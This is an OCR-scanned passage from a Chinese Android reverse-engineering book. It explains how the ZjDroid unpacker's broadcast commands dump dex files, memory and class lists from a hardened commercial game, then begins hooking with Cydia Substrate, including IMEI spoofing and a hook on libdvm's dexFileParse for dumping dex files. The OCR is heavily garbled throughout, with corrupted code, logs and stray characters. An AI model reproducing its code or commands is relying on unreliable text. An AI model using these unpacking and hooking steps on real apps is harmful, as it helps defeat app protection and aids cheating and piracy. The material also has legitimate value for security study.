data.order(ByteOrder.LITTLE ENDIAN); 
byte[] buffer - new byte[8192]; 
data.clear(); 
while (data.hasRemaining()) ( 
int count - Math.min(buffer.length, data.remaining()); 
data.get(buffer, 0, count); 


T Aa 0, count); 这 里 的 核心 方法 束 在 这 里 ， ЇН жєн] ЇН) 


y catch (IOException e1) í 是 ， 这 个 方法 是 native EB. 没有 公开 
el.printStackTrace(); | 
) 源码 ， 但 是 这 里 可 以 知道 他 的 大 体 思 EE 


看 到 这 里 有 一 个 核心 的 方法 ， 但 是 可 惜 的 是 这 个 方法 是 native 的 ， 而 这 个 工具 并 没有 把 native 层 的 代码 公开 ， 但 是 通过 这 里 
传递 的 参数 可 以 了 解 到 ， 底 层 应 该 是 采用 了 libdvm.so 或 者 是 libart.so 库 得 到 具体 的 肖 数 ， 然 后 通过 dex 对 应 的 cookie 值 获取 信 
自 


/LO 


命令 用 法 : 


am broadcast -a com.zjdroid.invoke --ei target [pid] --es cmd '("action":"dump_ 
dexfile","dexpath":"*****n): 


注意 这 里 的 dexpath 参 数 代表 需要 脱 壳 的 dex 文 件 ， 也 融 是 应 用 程序 文件 。 


3.backsmali 


这 个 命令 与 上 面 的 命令 功能 笑 不 多 ， 只 是 这 个 命令 多 了 一 层 操作 ， 束 是 把 dex 文 件 转化 成 smali 文 件 ， 所 以 这 里 不 再 详细 说 


明了 ， 可 以 移 得 到 dex 文 件 ， 然 后 通过 工具 得 到 smali 文 件 。 


命令 用 法 : 
am broadcast -a com.zjdroid.invoke --ei target pid --es cmd '("action":"backsmal 
i","dexpath":"*****")j' 


注意 这 里 的 dexpath 参 数 代表 需要 脱 壳 的 dex 文 件 ， 也 惑 是 应 用 程序 文件 。 而 最 终生 成 的 sgmali 文 件 是 放 
fr/data/data/xxx/smali КУ. 


4.dump mem 


这 个 命令 是 用 来 dump 出 应 用 程序 运行 时 内 存 中 指定 开始 位 置 和 长 度 的 内 存 块 数据 的 DumpMemCommandHandler， 代 码 
al FE: 


public static void dumpMem(OutputStream outstream, int start, int length) { 


ByteBuffer buffer = [NativeFunction.dumpMemory(start, length); 


saveByteBuffer(outstream, buffer); 


可 惜 这 个 方法 也 是 native 层 的 ， 但 是 可 以 知道 每 个 应 用 运行 时 的 内 存 地 址 都 在 /proc/[pid]j/maps 文 件 中 ， 如 下 所 示 : 


root@pisces:/ W cat /proc/23298/maps igrep cn.wjdiankong.xposedhook 
284388080-7284488E€ a888BbA8BB b3:1b 8218 /Zdata/app/cn.wjdiankong.xposedhook-2.apk 
28440800-72845808€ OAAAOAHA b3:1b 41105 /data/daluik-cache/data(appÜcn.wjdiankong 
28458080-7284"7 88€ 808018088 b3:1b 41105 /Zdata/daluik-cache^/dataf*appÜcn.wjdiankong 
628d4880-7620e 0AF 0000b000 b3:1b 8218 /Zdata/app/cn.wjdiankong.xposedhook-2.apk 
6280e080-76211908€ a88808808 b3:1b 41105 /Zdata/daluik-cache/data(app(cn.wjdiankong 
621e808080-7621*f BBE 0000b000 b3:1b 8210 /Zdata/app/cn.wjdiankong.xposedhook-2.apk 
621f 880-762208080E€ 00009000 b3:1b 8210 ZdataZappZ/cn.ujdiankong.xposedhook-2.apk 


rootüpisces:/ Í = 


那么 得 找 内 存 地 址 ， 然 后 使 用 memcpy 进 行内 人 存 数 据 拷 贝 也 是 非 营 简单 的 。 


命令 用 法 : 


am broadcast -a com.zjdroid.invoke --ei target [pid] --es cmd 'í("action":"dump_ 
rem","stárt":lll,"lengthi"':235]' 


注意 这 里 的 start 和 length 都 是 十 进 制 的， 而 不 是 十 六 进 制 的 数据 格式 。 
5.dump heap 


这 个 命令 可 以 dump 出 虚拟 机 的 堆 内 存 信息 ， 文 件 可 以 使 用 Java heap 工 具 进 行 分 析 ， 而 对 于 这 个 命令 想 一 下 应 该 也 知道 实 
现 逻 辑 ， 也 是 在 native 层 的 ， 而 且 这 个 代码 逻辑 应 该 和 上面 的 那个 命令 磊 不 多 。 


命令 用 法 : 


am broadcast -a com.zjdroid.invoke --ei target [pid] --es cmd 'í("action":"dump_ 
heap")' 


6.dump class 


这 个 命令 主要 用 于 dump 出 dex 文 件 中 的 类 信息 ， 因 为 在 DexFile 对 象 中 有 一 个 隐藏 的 方法 可 以 把 dex 文 件 中 的 所 有 类 名 获取 


到 getClassNameList， 如 下 代码 : 


public String[] dumpLoadableClass(String dexPath) í 
int mCookie = this.getCookie(dexPath); 
if (mCookie != 9) { 
return 


AE Пур 
" getClassNamel ist" new Class[] { int.class j, 


new Object[(] í mCookie }); m 
TT wA O 这 里 返回 的 列表 就 是 dex 
ogger.Log("the cookie is not right"); › . 
poet 文件 中 所 有 的 类 名 了 


return null; 


可 以 看 到 这 个 万 法 的 传 入 参数 为 一 个 dex 文 件 对 应 的 cookie 值 。 


命令 用 法 : 
am broadcast -a com.zjdroid.invoke --ei target pid --es cmd 
class","dexpath";"*****x*)! 


这 里 的 dexpath 是 需要 得 到 所 有 类 信息 的 dex 文 件 路 径 ， 也 就 是 应 用 的 apk 文 件 路 径 。 


a. invokeStaticMethod("dalvik.system.DexFile", 


'"(^acrion"s"durip.. 


这 个 命令 用 于 运行 时 动态 调用 Lua 脚 本 ， 该 功能 可 以 通过 Lua 脚 本 动态 调用 Java 人 代码。 使 用 场景 : 可 以 动态 调用 解密 函数 ， 
完成 解密 ; 可 以 动态 触 皮特 定 逻 辑 。 代 码 残 不 进行 分 析 了 ， 因 为 如 得 这 个 命令 很 少 使 用 。 
命令 用 法 : 
am broadcast -a com.zjdroid.invoke --ei target pid --es cmd '{"action":"invoke", 
"fllepatl":"«*-**-)! 
这 里 的 filepath 是 Lua 脚 本 文件 的 存放 路 径 。 
1 8.3 工具 日 志 信 息 
ZjDroid 工 具 除 了 操作 命令 ， 还 有 两 个 非常 重要 的 打印 日 志 的 tag: 
- adb logcat-s zjdroid-shell- {package name}。 这 个 tag 可 以 查看 上 面 每 个 命令 执行 的 结果 ， 便 于 查看 命令 执行 的 状态 。 
- adb logcat-s zjdroid-apimonitor-[package name}。 这 个 tag 可 以 监听 对 应 包 名 应 用 调用 的 API 信 息 ， 这 个 作用 有 点 类 似 于 运行 


权限 请 求 。 可 以 直接 通过 Xposed 提 供 的 方法 对 一 些 敏感 API 进 行 拦截 ， 然 后 添加 监控 代码 即 可 。 


1 8 4 工具 用 ; AZ SU 


HJ 


完全 分 析 完 ZDroid 工 具 的 功能 ， 下 面 惑 来 总 结 一 
1) 获取 apk 当 前 加 载 dex 文 件 信息 : 


am broadcast -a com.zjdroid.invoke --е1 target pid --es cmd 'í("action":"dump_ 
dexinfo")' 


2) NE Edex tre aures : 


am broadcast -a com.zjdroid.invoke --ei target pid --es cmd 'í"action":"dump 
class"."*dexboaLu"t tet m1 


3) 根据 Dalvik 相 关内 存 指针 动态 反 编 译 指定 dex， 并 以 文件 形式 保 仓 : 


am broadcast -a com.zjdroid.invoke --ei target pid --es cmd 'í("action":"backsmal 
E "dexpatnh" : Hox < < x< ÜU } ' 


4) dump 指 定 dex 内 存 中 的 数据 并 保存 到 文件 (数据 为 odex 格 式 ， 可 在 PC 上 反 编 译 ) : 


am broadcast -a com.zjdroid.invoke --ei target pid --es cmd 'í"action":"dump 
dex","dexpath":"*****")' 


5) dump 指 定 内 存 空间 区 域 数据 到 文件 : 


am broadcast -a com.zjdroid.invoke --ei target pid --es cmd '{"action": "dump_mem 
Tolare" 212345567," lendgth":125]' 


6) dump Dalvik 推 栈 信息 到 文件 ， 文 件 可 以 通过 Java heap tir LETTRES: 


am broadcast -a com.zjdroid.invoke --ei target pid --es cmd 'í("action":"dump 
heap" } ' 


7) 运行 时 动态 调用 Lua 脚 本 。 该 功能 可 以 通过 Lua 脚 本 动态 调用 Java 代 码 。 使 用 场景 : 可 以 动态 调用 解密 消 数 ， 完 成 解密 。 
可 以 动态 触 友 特定 逻辑 : 


am broadcast -a com.zjdroid.invoke --ei target pid --es cmd '("action":"invoke", 
"filepath" : "Ü k < <Ú } ' 


8) 相关 命令 执行 结果 查看 。 命 令 执 行 结果 : 


аар shell logcat -s zjdroid-shell-(package name) 


敏感 API 调 用 监控 输出 结 


аар shell logcat -s zjdroid-apimonitor-(package name) 


185 “工具 使 用 案例 


下 面 惑 要 用 一 个 案例 来 看 看 这 个 工具 到 底 如 何 使 用 ， 有 哪些 功效 。 案 例 是 捕 鱼 达 人 v1.0.1 版 本 ， 具 体 的 apk 文 件 可 以 目 行 去 
网 上 搜索 。 安 装 游戏 之 后 ， 然 后 顺便 把 上 面 的 站 Droid 模 块 工 具 也 安装 上 ， 之 后 进行 重启 生效 。 


最 好 是 单独 开 一 个 CMD 窗 口 用 来 查看 打印 结果 ， 但 是 从 上 面 的 命令 可 以 看 到 ， 应 该 需要 这 游戏 的 包 名 和 进程 Id， 那么 这 两 
个 数据 怎么 获取 呢 ? 其 实在 前 几 章 已 经 介绍 很 多 次 ， 用 一 个 命令 即 可 : adb shell dumpsys activity top。 如 下 所 示 ， 但 是 这 时 
候 需 要 运行 起 来 捕 鱼 达 人 游戏 : 


G:NJsersNJiangueil—-g>adb shell dumpsys activity top 
TASK org.cocos2d.fishingjou3 id-35 


ACTIVITY lorg.cocos2d.fishingjouy3Y.FishingJoy3fictivitu 41585180 {ріа=25304 


Local Activity 41f'7a9680 State: 
mResumed-true mStopped-false mFinished-false 
mLoadersStarted-true 


使 用 命令 就 可 以 获取 到 游戏 的 包 名 org.cocos2d.fishingjoy3 和 进程 id=25304， 这 两 个 数据 非常 重要 ， 这 里 可 以 先进 行 保 
管 ， 进 而 后 面 使 用 。 


下 面 首先 来 看 一 下 这 个 应 用 用 了 哪些 敏感 的 API 数 据 ， 使 用 上 面 查 看 日 志 的 命令 即 可 : 


аар shell logcat -s zjdroid-apimonitor-org.cocos2d.fishingjoy3 


运行 结果 如 下 所 示 : 


[>adhb shell logcat -s zjdroid-apimonitor-org.cocos2d.fishingjovy3 

of /deu/log/system 

of /devu/log/main 

'——-org.cocos2d.fishingjoy3€25384»5: Invoke android.app.ContextImpl-»registerReceiver 
——org.cocos2d.fishingjoy3€25304»: Register BroatcastReceiver 

'——-org.cocos2d.fishingjoy34253845: The BroatcastReceiver ClassName = class com.android.reuverse.mod.C 
——org.cocos2d.fishingjoy3425384»5: Intent fiction = [com.zjdroid.invuoke, ] 
——-org.cocos2d.fishingjoy3€25384»: Invoke android.content.ContentResoluer-»5registerContentObservuer 
'—-org.cocos2d.fishingjoy3€25384»5: content://settings/system/enable stylus gestures 
——org.cocos2d.fishingjoy3€253845: Invoke android.telephony.TelephonyManager-»getLineiíiNumber 
——-org.cocos2d.fishingjoy3€25384»5: Read PhoneNumber 一 > 

——org.cocos2d.fishingjoy3€25384»5: Invoke org.apache.http.impl.client.fibstractHttpClient-»5execute 
'—-org.cocos2d.fishingjoy3425384»5: Connect to URL 一 > 

——org.cocos2d.fishingjoy3€25384»5:|] HTTP Method : GET 

——org.cocos2d.fishingjoy3425384»:| HTTP URL : http://geo. da n -108119&channal-8088004056 
'—-org.cocos2d.f ishingjoy3425384»5: 
'—org.cocos2d.fishingjoy3(25384»5: Register BroatcastReceiver 
'—org.cocos2d.f ishingjoy325384»5 ; : : 
'—-org.cocos2d.f ishingjoy3€25384»5 
——-org.cocos2d.fishingjoy3€25384»5: Invoke org.apache. 2 «E Abstracth ЕЕр II execute 
——org.cocos2d.fishingjoy3€253845: Connect to URL 一 > 

——org.cocos2d.fishingjoy3425384»5: HTTP Method : POST 


这 里 有 网 络 请 求 信息 、 网 络 切换 的 广播 等 数据 ， 感 部 这 个 工具 的 功能 还 是 查 多 的 。 


下 面 再 来 看 一 下 这 个 应 用 的 dex 文 件 信 息 ， 可 以 使 用 下 面 合 令 即 可 : 


am broadcast -a com.zjdroid.invoke --ei target 25304 --es cmd 'í(action:dump 
dexinfo)' 


运行 之 后 的 结果 如 下 所 示 : 


oke ——е1 target 25304 ——-es cmd '<action:dump_dexinfo>” 
Broadcasting: Intent < act-com.zjdroid.invoke 《has extras? > 
Broadcast completed: result =й 

rootüpisces:/ W 


这 时 候 会 友 现 ， 运 行 没有 看 到 实际 效果 ， 原 因 是 需要 通过 日 志 才 能 看 到 数据 ， 因 为 上 面 命令 运行 的 结果 都 是 需要 通过 这 个 日 


志 才 可 以 看 到 的 : 


аар logcat -s zjdroid-shell-org.cocos2d.fishingjoy3 


查看 日 志 信 息 ， 结 果 如 下 所 示 : 


f>adhb logcat -s zjdroid-shell-org.cocos2d.fishingjoy3 

of /dev/log/system 

of /dev/log/main 

.сосоз2а.Ғіѕһіпјоу3<25304>: the package = org.cocos2d.fishingjoy3 has hook 
,cocos2d.fishingjouy3425384»: the app target id = 25384 
,cocos2d.fishingjouy3425384»: chaosump 

,cocos2d.fishingjouy3425384»: chaosump 

,cocos2d.fishingjouy3425384»5: fishingjovy3 

,cocos2d.fishingjou3425384»5: fishingjovy3 

,cocos2d.fishingjou3425384»: the cmd = dump dexinfo 
,.cocos2d.fishingjouy3«25384»: The DexFile Infomation 一 > 
,.cocos2d.fishingjou3425384»5: filepath:/data/app/org.cocos2d.fishingjoyuy3-1.apk mCookie:1982045888 
.cocos2d.fishingjou3425384»: End DexFile Infomation 


这 里 可 以 看 到 具体 的 信息 ， 看 到 有 一 个 filepath， 这 束 是 后 续 有 些 命令 需要 用 到 的 dex 路 径 ， 所 以 一 定 要 记 下 来 。 


接 下 来 看 一 个 关于 dump 出 游戏 中 所 有 的 类 名 的 命令 : 


am broadcast -a com.zjdroid.invoke --ei target 25304 --es cmd '("action":"dump_ 
class","dexpath":"/data/app/org.cocos2d.fishingjoy3-1l.apk"j' 


这 里 的 路 径 殉 是 上 面 获取 到 的 apk 路 径 ， 结 果 还 需要 通过 上 面 的 日 志 命令 才 可 以 看 到 ， 如 下 所 示 : 


ClassName = cn.egame.terminal.pausdk.EgamePauv 
ClassName = cn.egame.terminal.pauysdk.EgamePauyfictiuityu 
ClassName = cn.egame.terminal.paysdk.EgamePayListener 
ClassName = cn.egame.terminal.paysdk.SmsBroadcastHeceiver 
ClassName = cn.egame.terminal.paysdk.a 

ClassName = cn.egame.terminal.paysdk.c 

ClassName = cn.egame.terminal.paysdk.d 

ClassName = cn.egame.terminal.pavysdk.e 

ClassName = cn.egame.terminal.pavysdk.f 

ClassName = cn.egame.terminal.paysdk.q 

ClassName = cn.egame.terminal.paysdk.i 

ClassName = cn.egame.terminal.pavysdk.]j 

ClassName = cn.egame.terminal.pauysdk.k 

ClassName = cn.egame.terminal.pavysdk.l 

ClassName = cn.egame.terminal.paysdk.m 

ClassName = cn.egame.terminal.pavysdk.n 

ClassName = cn.egame.terminal.pavysdk.o 


ClassName = cn.sharesdk.ShareSDKUtils 
С1аѕѕ Мате com.alipay.android.app.IfilixPay 


这 就 导出 了 游戏 包含 的 所 有 类 名 了 。 


最 后 来 看 如 何 腊 壳 ， 这 是 最 关键 的 ， 也 是 本 章 的 重点 ， 当 然 也 是 这 个 工具 最 实用 的 一 个 功能 。 而 本 章 用 的 游戏 也 是 经 过 加 固 
处 理 的， 可 以 反 编 译 看 看 这 个 游戏 ， 如 图 18-3 所 示 。 


"Ë classes. dex 
IEEE Source code 


С, com. chaosvmp. Appir apper X 


5-88 com. chaosvmp package com.chaosvmp; 
c 
H-O BuildConfig import android.app.Application; 
O ChaosvmpReceiver import android.content.Context; 


H-O ChaoswvmpService 


m-(9 Constant 


import android.content.pm.ApplicationInfo; 


H-O pLibrary 


由 -全 Logger 


public class AppWrapper extends Application { 


private static final String TAG = "AppWrapper"; 


CP 
H-O Wtil 2g protected void attachBasetontext(Context base) { 
21 super.attachBaseContext(base); 
22 if (lutil.init()) 1 
23 System.out.println("[-*] shell run..."); 
24 Util.run(this); 
| Jl 
1 
38 public void onCreate() ү 
31 super.onCreate(); 
32 System.out.println("[-] AppWrapper-*onCreate()"); 
try 1 
36 ApplicationInfo applicationInfo = getPackageManager().getApplicat 
4g if (applicationInfo.metaData !- null) { 
41 String appName = (String) applicationInfo.metaData.get("app n 
42 System.out.println("[+] AppWrapper-»appName:" + appName); 
44. if (аррМате !- null && !appName.equals("")) 1 
45 String packageName = getPackageName(); 
46 System.out.println("[-*] AppWrapper-*packageName:" + pa 
47 DLibrary.getLibrary().cl(appName, раскареМате ) ; 


Y 


图 18-3 ”游戏 加 固 图 


会 友 现 没 几 个 类 ， 而 且 有 一 个 Application 类 ， 那 么 可 以 认定 这 个 游戏 被 加 固 了 ， 这 里 不 介绍 是 使 用 哪 家 的 加 固 平台 操作 
了 ， 也 不 再 使 用 IDA 等 工具 去 动态 调试 脱 这 了 ， 这 里 直接 使 用 这 个 工具 进行 操作 即 可 。 为 了 后 续 代 码 阅 读 方 便 ， 可 以 直接 获取 它 
的 smali 代 码 ， 使 用 这 个 命令 : 


am broadcast -a com.zjdroid.invoke --е1 target 25304 


"dexpath":"/data/app/org.cocos2d.fishingjoy3-l.apk")' 


这 个 命令 的 运行 结果 通过 日 志 查 看 ， 如 下 所 示 : 


start disassemble the mCookie 1982045880 


dumnative 

dumnativue 

the dexfile header item info start--5»5»»5»»»»»»5 
the stringStartOffset -112 

the tyupeStartOffset =99604 

the protoStartOffset -112668 

the fieldStartOffset -162784 

the methodStartOffset =243200 


the 
the 
the 


classStartOffset -403888 
classCount =2297 
dexfile header item info end«««««««««««-- 


--es cmd 


'(action:backsmali, 


而 这 个 smali 文 件 夹 是 存放 在 应 用 的 /data/app/org.cocos2d.fishingjoy3/smali 中 ， 可 以 把 它 拷 贝 出 来 即 可 ， 如 图 18-4 所 


小 \。 


= = — OO C 


МІ 3 t {гыт k smal k HttpUtils 


| 


HttpFetcher.smali 
SMALI 文件 
11.3 KB 


918-4 dump 出 游戏 之 后 的 smali 代 三 


可 以 看 到 成 功 脱 这 了 ， 生 成 了 游戏 的 所 有 smali 文 件 代 码 。 这 个 脱 过 操作 和 后 面 章节 介绍 使 用 IDA 工 具 进 行 脱 壳 的 原理 都 大 . 
不 多 ， 因 为 应 用 程序 不 管 号 么 加 固 ， 最 终 都 会 使 用 一 个 系统 阔 数 将 dex 驻 件 加 载 到 内 存 中 ， 而 加 载 之 前 肯定 要 进行 解密 操作 ， 只 
要 在 加 载 之 前 解密 之 后 进行 拉 截 即 可 。 
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绍 了 基于 Xposed 框 架 的 脱党 神器 ZjDtoid 的 实现 原理 以 及 具体 用 法 ， 从 而 使 读者 感受 到 Xposed 框 架 的 强大 之 处 。 当 然 
本 章 只 讲 了 一 部 分 功能 ， 还 可 以 利用 这 个 框架 编写 游戏 外 挂 等 操作 。 可 以 慢 慢 地 解读 这 个 框架 的 源码 ， 能 够 学 习 到 很 多 知识 点 。 


第 19 章 ”Native 层 Hook 伸 器 Cydia Substrate 


前 面 介 绍 了 Android 中 一 款 hook 神 器 Xposed， 本 草 介绍 另外 一 个 hook 神 器 Cydia Substrate， 当 逆向 游戏 和 应 用 的 时 候 遇 到 so 文 
件 中 的 一 个 重要 方法 ， 这 时 候 就 想 进 行 hook 操 作 ， 但 是 Xposed 几 平 没 法 用 ， 就 需要 使 用 这 个 框架 了 。 这 个 框架 的 优点 在 于 Hook 
底层 兄 数 非常 方便 ， 对 so 中 的 函数 进行 hook 操 作 非 常 便捷 。 


19.1 环境 搭建 


先 介绍 这 个 框 以 如 何 安 丢 使用， 操作 的 环境 如 下 : 


. 框架 版 本 : 0.9.4010 
- 是否 toot: 必须 toot 


关于 这 个 环境 ， 可 能 有 的 同学 操作 最 大 的 问题 就 在 于 设备 和 系统 ， 用 不 同 设备 、 不 同系 统 ， 可 能 安装 会 失败 ， 具 体 问题 可 能 
需要 自己 去 解决 了 。 关 于 框架 apk 和 功能 jar 包 下 载 地 址 可 以 去 官网 : http://www.cydiasubstrate.com。 


19.2 Hook Java 层 功能 


搭建 好 了 环境 ， 下 面 就 直接 操作 了 。 首 先 来 看 看 如 何 Hook Java 层 功能 。 
第 一 步 : 导入 jar 包 


在 Eclipse 中 新 建 一 个 Android 工 程 ， 将 下 载 好 的 框架 的 jar 包 拷贝 到 工程 的 libs 目 录 下 即 可 ， 如 图 19-1 所 示 。 


b gen [Generated Java Files] 
> BÀ Android 7.1.1 

b mà Android Private Libraries 
> mà Android Dependencies 

b #9; Binaries 


b BHH Archives 


b im Includes Hook Native 
се 的 功能 包 
> [h] DexFile.h 


TT hookdvm. cpp 


4 Ёз, libs Hook Jave 


b armeabi - Ax 
aspectjweaverJar | ШР 的 功能 


| substrate-api.jar 


d| substrate-bless.jar 


图 19-1 Fjar e 


第 二 步 : 编写 Hook 入 口 类 


具体 API| 不 多 介绍 了 ， 残 那么 几 个 ， 没 必要 详细 讲 。 下 面 代 码 对 系统 的 imei 进 行 Hook 操 作 了 : 


package cn.wjdiankong.substratehook; 


9$import java.lang.reflect.Method;[.| 


public class Main { Hook 操作 都 喜欢 选用 系统 的 imei, API 用 
ә у 法 和 Xposed 非常 类 似 ， 唯 一 不 同 的 是 这 里 


* substrate 初始 化 后 的 入 口 


*/ 需要 先 获 取 到 Method 对 象 ， 然 后 开始 


ə static void initialize() í 

//Hook IMEI 
ə MS.hookCLassLoad("android.telephony.TelephonyManager", new MS.ClassLoadHook() í 
ə @SuppressWarnings({ "rawtypes", "unchecked" }) 


public void classLoaded(Class<?> resources) í 
Method getDeviceId; 
try { 
getDeviceld = resources.getMethod("getDevicelIld"); 
y) catch (NoSuchMethodException e) í 
getDeviceld - null; 
} 
if (getDeviceId != пи11) í 
final MS.MethodPointer old = new MS.MethodPointer(); 


ə MS.hookMethod(resources, getDeviceld, new MS.MethodHook() í 
9 public Object invoked(Object object, Object...args)( 
Object result - null; 
tryi 
Log.i("jw", "hook imei start..."); 
result = old.invoke(object, args); 
Log.i("jw", "hook imei before value:"«result); 
result - "fourbrother"; 


)catch(Throwable е){ 


Log.i("jw", "hook imei err:"«Log.getStackTraceString(e)); 
h 


return result; 


}, old); 
Jelsei 


下 面 代码 是 对 系统 的 颜色 值 进行 了 Hook: 


//Hook System Color 
MS.hookCLassLoad("android.content.res.Resources", пем MS.ClassLloadHook() í 
QSuppressWarnings(( "unchecked", "rawtypes" }) 
public void classloaded(Class«?» resources) í 
Method getColor; 
try i 
getColor - resources.getMethod("getColor", Integer.TYPE); 
y catch (NoSuchMethodException e) í 
getColor - null; 
} 
if (getColor !- null) í 
final MS.MethodPointer old - new MS.MethodPointer(); 
MS.hookMethod(resources, getColor, new MS.MethodHook() í 
public Object invoked(Object resources, Object... args)( 
tryi 
int color - (Integer) old.invoke(resources, args); 
return color & -exeeeeffee | exeeffeeee; 
)catch(Throwable е){ 
Log.i("jw", "hook color err:"«Log.getStackTraceString(e)); 


h 
А return OxFFFFFFFF ; 网 上 有 人 Hook 系统 的 颜色 值 ， 这 
), old); 里 也 顺带 Hook 一 下 吧 


yelse{ 
Log.i("jw", "getColor == null"); 
} 
} 
}); 


第 三 步 : 配置 XML 信息 


在 AndroidManifest.xml 中 需要 配置 两 个 地 方 : 一 个 是 使 用 权限 ， 一 个 是 声明 hook 的 入 口 类 。 


<application 

android:allowBackup= "true" 

android:icon-"éGdrawable/ic Launcher" 

android:label-"Gstring/app name" 
android:theme- "GstylLe/AppTheme" 
android:hasCode-"false" » 

«activity 
android:name-"cn.wjdiankong.substratehook.MainActivity" 
android:label-"Gstring/app пате" > 
«intent-filter» 

«action android:name-"android.intent.action.MAIN" /» 
«category android:name-"android.intent.category.LAUNCHER" /> 
«/intent-filter» 
«/activity» 


Hook Java 层 需 要 设置 这 两 项 


<!-- 声明 substrate 的 注入 口味 Main 类 --» 
<meta-data 


android:name-"com.saurik.substrate.main" 
android:value-"cn.wjdiankong.substratehook.Main" /> 
«/application» 


代码 编写 完成 之 后 ， 和 直接 运行 安装 即 可 ， 前 提 是 需要 正确 安装 Cydia Substrate 框 架 程序 ， 安 装 成 功 界面 如 图 19-2 所 示 。 
安装 Hook 项 目 时 会 出 现 提 示 ， 如 图 19-3 所 示 。 


所 击 按钮 ， 进 入 框架 界面 ， 点 击 重 启 即 可 。 然 后 查看 系统 界面 颜色 以 及 返回 的 Iimei 值 ， 如 图 19-4 所 示 。 


“Qk Substrate 
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图 19-2 ”安装 成 功 
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图 19-3 ”提示 安装 Hook 项 目 


图 19-4 ”框架 界面 
查看 颜色 的 确 变 成 粉色 了 ， 再 看 看 imei 值 的 修改 : 


hook imei start... 
hook imei before value:86397002395764198 


get imei:fourbrother 


imei 值 也 Hook 成 功 了 。 到 这 里 就 用 Cydia Substrate 框 架 Hook 了 Java 层 功能 。 之 前 提 到 的 Xposed 框 架 也 是 可 以 做 到 这 些 


1933 Hook Native 层 功能 


下 面 继续 来 看 如 何 Hook Native 层 的 功能 ， 也 是 本 章 的 重点 。 


第 一 步 : 创建 一 个 Native 项 目 


这 里 用 Eclipse 操作 ， 简 单 便捷 ， 有 很 多 人 问 为 什么 不 用 As， 这 要 看 每 个 人 的 使 用 习惯 。 虽 然 As 工 具 是 主流 ， 不 过 本 人 还 是 
习惯 用 Eclipse， 如 图 19-5 所 示 。 


第 二 步 : 导入 Substrate 的 Native 功 能 


需要 导入 一 个 substrate.h 头 文件 ， 和 两 个 so 功能 包 。Native 层 应 用 都 是 这 么 操作 的 ， 提 供 一 个 头 文 件 告 诉 你 APl， 上 县 体 实现 
在 so 包 中 。 


m] 


m" 


а WÈ CydiaSubstrateHook 


и" 


da деп [Generated Java Files] 

mà Android 7.1.1 

=, Android Private Libraries 

B) Android Dependencies 

> um Binaries 

> ЕН Archives 

> iE Includes 

„н 

b [mn DexFile.h 

> [c] hookdvm.cpp 

> [h] substrate.h 
| @ Android.mk 
Iibsubstrate.so 
IiIbsubstrate-dvm.so 


图 19-5 ”创建 Native 项 目 


第 三 步 : 寻找 Hook 的 函数 名 


这 里 网 上 没有 好 的 hook 人 代码， 为 了 更 好 的 了 解 这 个 工具 的 厉害 之 处 ， 弄 一 个 比较 实际 的 案例 殉 是 hook 系 统 加 载 dex 的 函 
效 ， 这 样 融 可 以 获取 到 每 个 应 用 的 dex 文 件 了 ， 这 种 方式 对 于 早期 加 固 是 一 个 比较 好 的 脱 放 方案 。 在 乙 前 介绍 脱 壳 会 使 用 IDA 企 
所 定 函数 处 下 个 断 点 ， 这 里 如 果 要 hook 的 话 ， 融 需要 找到 这 个 加 载 dex 的 函数 名 称 ， 一 定 要 记 的 是 导出 的 冰 数 名 。 


下 面 就 用 IDA 来 查找 需要 Hook 的 函数 名 ， 首 先导 出 设备 的 libdvm.so 文 件 : system/lib/libdvm.so 


pootüüpiscesz/sustemz/lihb H ls igyrep libdum.so 
libdum.so 


rontÜpisces:^/system^Álib H exit 


ЎА ВІРА, =) аехр 5, SUE]19-6Brm. 


Ed Exports 


Name Address Ordinal 
dexFleParse(uchar const* uint, int) 00087610 


图 19-6 220 деху 


ДИА Ехрогї51И гт, AA migzxdexFileParseegZX, MHA: 


; DWORD _ fastcs ed — int8 *, unsigned int, int) 


| EXPORT | u 


I DE XREF: dumDexFileOüpenFromFd(int,DumDex xx)*521p 
N ; dumDexFileOüpenPartial(uoid constx,int,DumDex жж) +6їр 
uar 28 = -0х28 | 
- i : — k 里 FI T* *— 3 YE 
var 2s = epp 这 才 是 我 们 要 Hook H PRA 


8 ЈЕХРОҺКТРА , Нооке, ХЕЗ, TREAHOOIKGSGUURBS. РА IYRIGXABURENBU S SX 
类 型 和 返回 类 型 ， 这 个 也 好 办 ， 因 为 有 Android 源 码 ， 所 以 直接 在 源码 中 找 这 个 函数 参数 说 明 、 已 经 返回 值 况 明 即 可 。 因 为 
Native 层 Hook 的 其 实 是 函数 据 针 的 奉 换 ， 所 以 如 果 想 Hook 原 来 的 函 数 ， 必 须 新 建 一 个 和 原来 一 样 的 函数 功能 ， 然 后 传递 轴 数 
旬 针 即 可 。 这 个 消 数 的 参数 和 返回 值 定义 如 下 : 


DexFile* dexFileParse(const unsigned _ int8 *, unsigned int, int); 


земаа, Э-Э RdexxlHüyietabuE, 98 — 1S3 gdeocPHISIKIS, Tx AUR] EAS A 
了 。 这 里 需要 获取 DexFile 类 型 ， 这 个 直接 在 Android 源 码 目录 下 找到 这 个 头 文 件 DexFile.h 即 可 。 然 后 导入 工程 中 。 这 样 束 找到 
了 需要 hook 的 消 数 ， 下 面 束 开始 编写 hook 代 码 了 。 


第 四 步 : 编写 hook 代 码 


在 编写 hook 代 码 之 前 ， 需 要 考虑 这 几 件 事 : 


hook 之 后 的 dex 存 在 哪 ? 怎么 存 ? 这 里 直接 通过 当前 的 pid 值 获取 进程 名 ， 然 后 将 其 作为 dex 的 文件 名 ， 这 样 每 个 进程 的 dex 
文件 名 就 不 会 冲突 了 。 这 里 要 理解 一 点 : 一 个 进程 对 应 一 个 DVYM， 加 载 一 个 dex 文 件 。 所 以 这 里 hook 其 实 就 是 注入 每 个 进程 ， 在 


每 个 进程 中 hook 每 个 函数 功能 。 


-需要 过 滤 系 统 进程 ， 并 不 是 所 有 的 进程 都 是 想 要 hook 的 ， 而 且 这 些 进程 未 必 有 dex 文 件 ， 比 如 鼻祖 进程 zygote， 而 这 些 进程 
过 滤 规则 ， 需 要 自己 打印 看 结果 ， 然 后 构造 。 


下 面 开 始 写 代 码 了 ， 首 先 定 义 想 要 hook 的 So 文件 : 


MSConfig(MSFilterLibrary, "/system/lib/libdvm.so"); 


主要 是 第 二 个 参数 ， 是 需要 hook 的 so 路 径 。 然 后 在 入 口 处 开始 hook 代 码 : 


MSInitialize{ 
1060( "Substrate initialized."); 


геев? 这 里 需要 从 so HP dX FI) т 92 hook НУ РА 27 

— : r— 5% symbol 名称， 然后 调用 MSHookFunction 

er, / 即 可 ， 这 个 函数 传递 的 是 函数 符号 、 新 函 
数 的 地 址 、 旧 旺 数 地 址 


void dexload = MSFindSymbol(image, X 712dexFileParsePKhji ); 
